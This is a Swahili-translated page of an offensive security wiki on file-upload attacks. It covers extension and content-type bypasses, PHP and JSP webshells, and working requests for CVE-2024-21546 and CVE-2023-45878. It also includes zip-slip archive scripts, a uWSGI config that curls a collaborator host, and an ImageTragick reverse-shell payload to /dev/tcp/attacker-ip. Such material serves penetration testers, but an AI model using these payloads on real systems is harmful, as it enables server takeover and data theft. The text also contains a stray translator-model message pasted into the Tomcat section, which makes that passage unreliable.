Kupakia Faili

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Mbinu za Jumla za Kupakia Faili

Viendelezi vingine vinavyofaa:

• PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
• Working in PHPv8: .php, .php4, .php5, .phtml_, .module_, .inc_, .hphp_, .ctp_
• ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
• Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
• Coldfusion: .cfm, .cfml, .cfc, .dbm
• Flash: .swf
• Perl: .pl, .cgi
• Erlang Yaws Web Server: .yaws

Kuepuka ukaguzi wa viendelezi vya faili

1. Ikiwa zinatumika, angalia viendelezi vilivyotajwa hapo juu. Pia vipime kwa kutumia herufi kubwa: pHp, .pHP5, .PhAr …
2. Angalia kuongeza kiendelezi halali kabla ya kiendelezi cha utekelezaji (tumia viendelezi vilivyotajwa hapo juu pia):

• file.png.php
• file.png.Php5

3. Jaribu kuongeza herufi maalum mwishoni. Unaweza kutumia Burp kufanya bruteforce kwa ascii na Unicode viharusi. (Kumbuka kwamba unaweza pia kujaribu kutumia viendelezi vilivyotajwa hapo awali)

• file.php%20
• file.php%0a
• file.php%00
• file.php%0d%0a
• file.php/
• file.php.\
• file.
• file.php….
• file.pHp5….

4. Jaribu kupita ulinzi kwa kuchezea parser ya kiendelezi upande wa server kwa mbinu kama kuirudia kiendelezi au kuongeza takataka data (bits za null) kati ya viendelezi. Unaweza pia kutumia viendelezi vilivyotajwa hapo awali kuandaa payload bora.

• file.png.php
• file.png.pHp5
• file.php#.png
• file.php%00.png
• file.php\x00.png
• file.php%0a.png
• file.php%0d%0a.png
• file.phpJunk123png

5. Ongeza tabaka lingine la viendelezi kwa ukaguzi uliotangulia:

• file.png.jpg.php
• file.php%00.png%00.jpg

6. Jaribu kuweka kiendelezi cha exec kabla ya kiendelezi halali na uombe seva isesanifiwe vibaya. (useful to exploit Apache misconfigurations where anything with extension** .php, but not necessarily ending in .php** will execute code):
7. Kutumia NTFS alternate data stream (ADS) katika Windows. Katika kesi hii, herufi ya colon “:” itaingizwa baada ya kiendelezi kilichozuiwa na kabla ya kile kilichoruhusiwa. Matokeo yake, faili tupu yenye kiendelezi kilichozuiliwa itaumbwa kwenye server (mfano “file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa mbinu nyingine kama kutumia short filename yake. Muundo wa “::$data” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongezea nukta baada ya muundo huu kunaweza kusaidia kupita vikwazo zaidi (mfano “file.asp::$data.”)
8. Jaribu kuvunja mipaka ya urefu wa jina la faili. Kiendelezi halali kinakatwa. Na PHP hatari inabaki. AAA<–SNIP–>AAA.php

# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check response how many characters it alllows. Let's say 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Make the payload
AAA<--SNIP 232 A-->AAA.php.png

UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) – CVE-2024-21546

Baadhi ya upload handlers hufupisha au kurekebisha nukta za mwisho kutoka kwa jina la faili lililohifadhiwa. Katika UniSharp’s Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupitisha uthibitishaji wa viendelezi kwa:

• Kutumia MIME ya picha halali na magic header (mfano, PNG’s \x89PNG\r\n\x1a\n).
• Kuitaja faili iliyopakuliwa kwa kiendelezi cha PHP ikifuatwa na nukta, mfano, shell.php..
• Seva inakatakata nukta ya mwisho na kuhifadhi shell.php, ambayo itaendesha ikiwa imewekwa katika direktorari inayotumika kwa wavuti (default public storage like /storage/files/).

Minimal PoC (Burp Repeater):

POST /profile/avatar HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="upload"; filename="0xdf.php."
Content-Type: image/png

\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--

Kisha fikia njia iliyohifadhiwa (kawaida katika Laravel + LFM):

GET /storage/files/0xdf.php?cmd=id

Kwepa Content-Type, Magic Number, Compression & Resizing

• Kwepa Content-Type checks kwa kuweka value ya Content-Type header kuwa: image/png , text/plain , application/octet-stream

1. Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt

• Kwepa ukaguzi wa magic number kwa kuongeza mwanzoni mwa faili bytes of a real image (kumdanganya amri ya file). Au ingiza shell ndani ya metadata:
  exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
\ au unaweza pia kuingiza payload moja kwa moja ndani ya picha:
  echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
• Ikiwa compressions zinaongezwa kwenye picha yako, kwa mfano kwa kutumia baadhi ya maktaba za PHP kama PHP-GD, mbinu zilizotangulia hazitakuwa na manufaa. Hata hivyo, unaweza kutumia PLTE chunk technique defined here kuingiza maandishi yatakayodumu baada ya compression.
• Github with the code
• Tovuti pia inaweza kuwa inafanya resizing ya image, kwa mfano kwa kutumia functions za PHP-GD imagecopyresized au imagecopyresampled. Hata hivyo, unaweza kutumia IDAT chunk technique defined here kuingiza maandishi yatakayodumu baada ya compression.
• Github with the code
• Mbinu nyingine ya kutengeneza payload itakayodumu hata baada ya image resizing, kwa kutumia PHP-GD function thumbnailImage. Hata hivyo, unaweza kutumia tEXt chunk technique defined here kuingiza maandishi yatakayodumu baada ya compression.
• Github with the code

Mbinu Nyingine za Kuangalia

• Tafuta udhaifu wa rename faili iliyopakuliwa tayari (kubadilisha extension).
• Tafuta udhaifu wa Local File Inclusion ili kutekeleza backdoor.
• Uwezekano wa kufichuliwa kwa taarifa:

1. Pakia mara nyingi (na kwa wakati mmoja) faili ile ile yenye jina lile
2. Pakia faili yenye jina la file au folder ambalo tayari lipo
3. Kupakia faili lenye “.” , “..”, au “…” kama jina. Kwa mfano, katika Apache kwenye Windows, ikiwa application inaonyesha faili zilizopakuliwa katika saraka “/www/uploads/”, jina la faili “.” litaumba faili liitwalo uploads” katika saraka “/www/”.
4. Pakia faili ambayo inaweza kuwa vigumu kufutwa kama “…:.jpg” katika NTFS. (Windows)
5. Pakia faili katika Windows yenye invalid characters kama |<>*?” kwenye jina lake. (Windows)
6. Pakia faili katika Windows ukitumia majina yaliyohifadhiwa (reserved / forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.

• Pia jaribu kupakia executable (.exe) au .html (inayoonekana isiyo hatarishi) ambayo ita execute code wakati itafunguliwa kwa bahati mbaya na mhandisi wa kosa.

Special extension tricks

Ikiwa unajaribu kupakia faili kwenye PHP server, tazama mbinu ya .htaccess ya kuendesha code.
Ikiwa unajaribu kupakia faili kwenye ASP server, tazama mbinu ya .config ya kuendesha code.

Faili za .phar ni kama .jar kwa java, lakini kwa php, na zinaweza kutumika kama php file (kuziendesha kwa php, au kuzijumuisha ndani ya script…)

Extension .inc wakati mwingine hutumika kwa faili za php ambazo hutumika tu kuimport files, hivyo, kwa wakati fulani, mtu anaweza kuwa ameruhusu extension hii itekelezwe.

Jetty RCE

Ikiwa unaweza kupakia faili ya XML kwenye Jetty server unaweza kupata RCE because **new .xml and .war are automatically processed. Kwa hivyo, kama ilivyoelezwa kwenye picha ifuatayo, pakia faili ya XML kwenye $JETTY_BASE/webapps/ na tarajia shell!

uWSGI RCE

Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa awali: uWSGI RCE Exploitation.

Vulnerabilities za Remote Command Execution (RCE) zinaweza kutumiwa kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha faili ya usanidi .ini. Faili za usanidi za uWSGI zinatumia sintaksia maalum kuingiza “magic” variables, placeholders, na operators. Kwa mfano, operator ‘@’, inayotumiwa kama @(filename), imetengenezwa kuingiza yaliyomo ya faili. Miongoni mwa mipango mbalimbali inayotumika katika uWSGI, scheme ya “exec” ni hasa yenye nguvu, ikiruhusu kusoma data kutoka kwenye standard output ya mchakato. Kipengele hiki kinaweza kudhibitiwa kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati faili ya usanidi .ini inapotibiwa.

Zingatia mfano ufuatao wa faili hatari uwsgi.ini, unaoonyesha schemes mbalimbali:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

Utekelezaji wa payload hutokea wakati configuration file inapo chambuliwa. Ili configuration ianze kufanya kazi na ichambuliwe, mchakato wa uWSGI lazima uanzishwe upya (pengine baada ya crash au kwa sababu ya Denial of Service attack) au file lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha file kwa vipindi vilivyowekwa mara tu kinapogundua mabadiliko.

Ni muhimu kuelewa utovu wa uchambuzi wa configuration file kwa uWSGI. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya binary file (kama image au PDF), ikipanua zaidi wigo wa matumizi mabaya yanayowezekana.

Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)

Endpoint isiyo na uthibitisho katika Gibbon LMS inaruhusu kuandika file kwa hiari ndani ya web root, ikisababisha pre-auth RCE kwa kuweka PHP file. Toleo zilizoathiriwa: hadi na pamoja na 25.0.01.

• Endpoint: /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
• Method: POST
• Required params:
• img: data-URI-like string: [mime];[name],[base64] (server inapuuza type/name, hufanya base64-decode sehemu ya mwisho)
• path: destination filename relative to Gibbon install dir (e.g., poc.php or 0xdf.php)
• gibbonPersonID: any non-empty value is accepted (e.g., 0000000001)

Minimal PoC ya kuandika na kusoma tena file:

# Prepare test payload
printf '0xdf was here!' | base64
# => MHhkZiB3YXMgaGVyZSEK

# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'

# Verify write
curl http://target/Gibbon-LMS/poc.php

Weka webshell ndogo na tekeleza amri:

# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==

curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'

curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'

Notes:

• The handler inafanya base64_decode($_POST["img"]) after splitting by ; and ,, then inaandika bytes kwenye $absolutePath . '/' . $_POST['path'] bila validating extension/type.
• Msimbo unaotekelezwa unaendesha kama mtumiaji wa web service (e.g., XAMPP Apache on Windows).

Marejeleo ya bug hii ni pamoja na usd HeroLab advisory na NVD entry. Angalia sehemu ya References hapa chini.

wget File Upload/SSRF Trick

Wakati mwingine unaweza kugundua kuwa server inatumia wget kudownload files na unaweza indicate the URL. Katika visa hivi, msimbo unaweza kuwa unakagua kwamba extension ya faili zilizopakuliwa iko ndani ya whitelist ili kuhakikisha kwamba ni faili zilizoruhusiwa tu ndizo zitakazopakuliwa. Hata hivyo, this check can be bypassed.\

The maximum length of a filename in linux is 255, however, wget truncate the filenames to 236 characters. You can download a file called “A”*232+“.php”+“.gif”, this filename will bypass the check (as in this example “.gif” is a valid extension) but wget will rename the file to “A”*232+“.php”.

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080

#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

Note that chaguo nyingine you may be thinking of to bypass this check is to make the HTTP server redirect to a different file, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This haitafanya kazi isipokuwa wget is being used with the parameter --trust-server-names because wget will download the redirected page with the name of the file indicated in the original URL.

Kutoroka upload directory kupitia NTFS junctions (Windows)

( Kwa shambulio hili utahitaji ufikiaji wa ndani kwenye mashine ya Windows ) When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads<id>) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code.

Example flow to redirect uploads into XAMPP webroot:

:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
::    Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882

:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs

:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
::    Minimal PHP webshell for testing
::    <?php echo shell_exec($_REQUEST['cmd']); ?>

:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"

Vidokezo

• mklink /J inaunda NTFS directory junction (reparse point). Akaunti ya web server lazima ifuate junction na kuwa na ruhusa ya kuandika kwenye destination.
• Hii inaelekeza uandishi wowote wa faili; ikiwa destination inatekeleza scripts (PHP/ASP), hii inageuka kuwa RCE.
• Defenses: usiruhusu writable upload roots ziwe attacker‑controllable chini ya C:\Windows\Tasks au sawa; zuia junction creation; thibitisha extensions server‑side; hifadhi uploads kwenye volume tofauti au kwa deny‑execute ACLs.

GZIP-compressed body upload + path traversal in destination param → JSP webshell RCE (Tomcat)

Baadhi ya upload/ingest handlers huandika raw request body kwenye filesystem path ambayo imejengwa kutoka kwa user-controlled query parameters. Ikiwa handler pia inasaidia Content-Encoding: gzip na inashindwa kukanonikalize/kuthibitisha destination path, unaweza kuchanganya directory traversal na gzipped payload ili kuandika arbitrary bytes ndani ya web-served directory na kupata RCE (mfano, kuangusha JSP chini ya Tomcat’s webapps).

Generic exploitation flow:

• Prepare your server-side payload (e.g., minimal JSP webshell) and gzip-compress the bytes.
• Tuma POST ambapo path parameter (mfano, token) ina traversal inayotoroka folder iliyokusudiwa, na file inaonyesha filename inayotakiwa kuhifadhiwa. Weka Content-Type: application/octet-stream na Content-Encoding: gzip; body ni payload iliyopakizwa.
• Vinjari hadi faili iliyoorodheshwa ili kusababisha execution.

Illustrative request:

POST /fileupload?token=..%2f..%2f..%2f..%2fopt%2ftomcat%2fwebapps%2fROOT%2Fjsp%2F&file=shell.jsp HTTP/1.1
Host: target
Content-Type: application/octet-stream
Content-Encoding: gzip
Content-Length: <len>

<gzip-compressed-bytes-of-your-jsp>

I don’t have the contents of src/pentesting-web/file-upload/README.md. Please paste the README.md text you want translated to Swahili (I will keep code, tags, links and paths unchanged).

GET /jsp/shell.jsp?cmd=id HTTP/1.1
Host: target

Notes

• Target paths vary by install (e.g., /opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/ in some stacks). Folda yoyote iliyowekwa wazi kwenye wavuti inayotekeleza JSP itafanya kazi.
• Burp Suite’s Hackvertor extension inaweza kuzalisha gzip body sahihi kutoka kwa payload yako.
• Hii ni pattern safi ya pre-auth arbitrary file write → RCE; haitegemei multipart parsing.

Mitigations

• Tambua upload destinations upande wa server; usiamini path fragments zinazotolewa na clients.
• Canonicalize na uhakikishe kwamba path iliyotatuliwa inabaki ndani ya directory ya msingi iliyoorodheshwa.
• Hifadhi uploads kwenye volume isiyoweza kutekelezwa na kata utekelezaji wa script kutoka kwa paths zinazoweza kuandikwa.

Tools

• Upload Bypass ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu file upload mechanisms. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kutambua na kutumia vulnerabilities, kuhakikisha tathmini kamili ya web applications.

Corrupting upload indices with snprintf quirks (historical)

Baadhi ya legacy upload handlers ambazo zinatumia snprintf() au sawa kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda muundo wa _FILES. Kutokana na kutokuwiana na kukatwa katika tabia ya snprintf(), single upload iliyotengenezwa kwa uangalifu inaweza kuonekana kama files nyingi zilizo na index upande wa server, ikachanganya logic inayodhani muundo thabiti (kwa mfano, kuiangalia kama multi-file upload na kuchukua matawi yasiyo salama). Ingawa ni niche leo, pattern ya “index corruption” mara kwa mara inarudi kuonekana katika CTFs na codebases za zamani.

From File upload to other vulnerabilities

• Weka filename kuwa ../../../tmp/lol.png and try to achieve a path traversal
• Weka filename kuwa sleep(10)-- -.jpg and you may be able to achieve a SQL injection
• Weka filename kuwa <svg onload=alert(document.domain)> to achieve a XSS
• Weka filename kuwa ; sleep 10; ili kujaribu some command injection (more command injections tricks here)
• XSS in image (svg) file upload
• JS file upload + XSS = Service Workers exploitation
• XXE in svg upload
• Open Redirect via uploading svg file
• Jaribu different svg payloads kutoka https://github.com/allanlw/svg-cheatsheet
• Famous ImageTrick vulnerability
• Ikiwa unaweza kuashiria web server ichukue picha kutoka kwa URL unaweza kujaribu kutekeleza SSRF. Ikiwa hii image itahifadhiwa kwenye tovuti ya public, pia unaweza kuonyesha URL kutoka https://iplogger.org/invisible/ na kuiba taarifa za kila mgeni.
• XXE and CORS bypass with PDF-Adobe upload
• PDF zilizoundwa maalum kwa XSS: Ukurasa ufuatao unaonyesha jinsi ya inject PDF data to obtain JS execution (see: following page). Ikiwa unaweza upload PDFs unaweza kuandaa PDF itakayotekeleza JS yoyote kama inavyoelezwa.
• Upload the [eicar](https://secure.eicar.org/eicar.com.txt) content ili kuangalia ikiwa server ina antivirus yoyote
• Angalia kama kuna size limit kwa uploading files

Here’s a top 10 list of things that you can achieve by uploading (from here):

1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
2. SVG: Stored XSS / SSRF / XXE
3. GIF: Stored XSS / SSRF
4. CSV: CSV injection
5. XML: XXE
6. AVI: LFI / SSRF
7. HTML / JS : HTML injection / XSS / Open redirect
8. PNG / JPEG: Pixel flood attack (DoS)
9. ZIP: RCE via LFI / DoS
10. PDF / PPTX: SSRF / BLIND XXE

Burp Extension

GitHub - PortSwigger/upload-scanner: HTTP file upload scanner for Burp Proxy

Magic Header Bytes

• PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["
• JPG: "\xff\xd8\xff"

Refer to https://en.wikipedia.org/wiki/List_of_file_signatures for other filetypes.

Zip/Tar File Automatically decompressed Upload

If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:

Symlink

Pakia link iliyo na soft links kwenda kwa files nyingine, kisha, ukifika kwenye files zilizodidondolewa utaweza kupata files zilizo linked:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

Fungua katika folda tofauti

Kuundwa kutoarifiwa kwa faili ndani ya katalogi wakati wa ufungaji ni tatizo kubwa. Ingawa hapo awali ilidhaniwa usanidi huu ungezuia utekelezaji wa amri za OS-level kupitia kupakia faili zenye madhara, msaada wa compression wa kimnara na uwezo wa directory traversal katika muundo wa ZIP unaweza kutumiwa vibaya. Hii inawawezesha watapeli kuvuka vikwazo na kutoroka secure upload directories kwa kuingilia utendaji wa decompression wa programu inayolengwa.

Exploit ya otomatiki ya kutengeneza faili kama hizi inapatikana kwenye evilarc on GitHub. Zana inaweza kutumika kama ifuatavyo:

# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

Zaidi ya hayo, symlink trick with evilarc ni chaguo. Ikiwa lengo ni kulenga faili kama /flag.txt, lazima uunde symlink ya faili hiyo kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa uendeshaji wake.

Hapo chini kuna mfano wa code ya Python inayotumika kuunda faili zip yenye madhara:

#!/usr/bin/python
import zipfile
from io import BytesIO


def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

Abusing compression for file spraying

Kwa maelezo zaidi angalia chapisho la asili katika: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

1. Creating a PHP Shell: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia $_REQUEST.

<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>

2. File Spraying and Compressed File Creation: Mafaili mengi yameundwa na arhivu ya zip imekusanywa ikiwa na mafaili haya.

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php

3. Modification with a Hex Editor or vi: Majina ya mafaili ndani ya zip yamebadilishwa kwa kutumia vi au hex editor, kubadilisha “xxA” kuwa “../” ili kupita kwenye saraka.

:set modifiable
:%s/xxA/../g
:x!

ZIP NUL-byte filename smuggling (PHP ZipArchive confusion)

Wakati backend inathibitisha entries za ZIP kwa kutumia PHP’s ZipArchive lakini utoaji unaandika kwenye filesystem kwa kutumia majina ghafi, unaweza kusafirisha extension isiyoruhusiwa kwa kuweka NUL (0x00) kwenye sehemu za jina la faili. ZipArchive huchukulia jina la entry kama C‑string na hukata kwenye NUL ya kwanza; filesystem inaandika jina kamili, ikiacha kila kitu baada ya NUL.

Mzunguko wa juu:

• Tayarisha faili halali ya container (mfano, PDF halali) ambayo inaweka stub ndogo ya PHP kwenye stream ili magic/MIME ibaki PDF.
• Ipe jina kama shell.php..pdf, zipi, kisha hex‑edit ZIP local header na central directory filename kubadilisha . ya kwanza baada ya .php kuwa 0x00, ikitoa shell.php\x00.pdf.
• Validators zinazotegemea ZipArchive zitaona shell.php .pdf na kuruhusu; extractor inaandika shell.php kwenye disk, ikipelekea RCE ikiwa folder ya upload inaweza kutekelezwa.

Minimal PoC steps:

# 1) Build a polyglot PDF containing a tiny webshell (still a valid PDF)
printf '%s' "%PDF-1.3\n1 0 obj<<>>stream\n<?php system($_REQUEST["cmd"]); ?>\nendstream\nendobj\n%%EOF" > embedded.pdf

# 2) Trick name and zip
cp embedded.pdf shell.php..pdf
zip null.zip shell.php..pdf

# 3) Hex-edit both the local header and central directory filename fields
#    Replace the dot right after ".php" with 00 (NUL) => shell.php\x00.pdf
#    Tools: hexcurse, bless, bvi, wxHexEditor, etc.

# 4) Local validation behavior
php -r '$z=new ZipArchive; $z->open("null.zip"); echo $z->getNameIndex(0),"\n";'
# -> shows truncated at NUL (looks like ".pdf" suffix)

Vidokezo

• Badilisha ZOTE occurrences za filename (local na central directory). Zana nyingine huongeza entry ya data descriptor pia — rekebisha all name fields, ikiwa zipo.
• Faili ya payload lazima bado ipitie server‑side magic/MIME sniffing. Kuingiza PHP ndani ya PDF stream kunahifadhi header kuwa halali.
• Inafanya kazi pale njia za enum/validation na extraction/write zinapokosa kukubaliana kuhusu kushughulikia string.

Stacked/concatenated ZIPs (parser disagreement)

Kuunganisha ZIP mbili sahihi kunazalisha blob ambapo parsers tofauti zinazingatia rekodi tofauti za EOCD. Zana nyingi hupata End Of Central Directory (EOCD) ya mwisho, wakati baadhi ya maktaba (mfano, ZipArchive katika workflows maalum) zinaweza kuchakata archive ya kwanza wanayokutana nayo. Ikiwa validation itaorodhesha archive ya kwanza na extraction itatumia zana nyingine inayoheshimu EOCD ya mwisho, archive isiyo hatari inaweza kupitisha ukaguzi wakati ile yenye madhara inachukuliwa/inetolewa.

PoC:

# Build two separate archives
printf test > t1; printf test2 > t2
zip zip1.zip t1; zip zip2.zip t2

# Stack them
cat zip1.zip zip2.zip > combo.zip

# Different views
unzip -l combo.zip   # warns about extra bytes; often lists entries from the last archive
php -r '$z=new ZipArchive; $z->open("combo.zip"); for($i=0;$i<$z->numFiles;$i++) echo $z->getNameIndex($i),"\n";'

Mfano wa matumizi mabaya

• Unda archive isiyo hatari (aina inayoruhusiwa, mfano PDF) na archive ya pili yenye extension iliyozuiwa (mfano, shell.php).
• Unganisha faili hizo: cat benign.zip evil.zip > combined.zip.
• Ikiwa server inathibitisha kwa parser mmoja (inaona benign.zip) lakini inatoa kwa parser mwingine (inashughulikia evil.zip), faili iliyozuiwa inaishia kwenye extraction path.

ImageTragic

Pakia yaliyomo haya kwa extension ya picha ili kutumia udhaifu (ImageMagick , 7.0.1-1) (kutoka kwenye exploit)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Kuingiza PHP Shell kwenye PNG

Kuingiza PHP shell kwenye chunk ya IDAT ya faili ya PNG kunaweza kupitisha kwa ufanisi baadhi ya operesheni za usindikaji picha. The functions imagecopyresized and imagecopyresampled from PHP-GD zinahusiana sana katika muktadha huu, kwani kawaida zinatumika kwa resizing na resampling ya picha, mtawalia. Uwezo wa PHP shell iliyojazwa kubaki bila kuathiriwa na operesheni hizi ni faida kubwa kwa matumizi fulani.

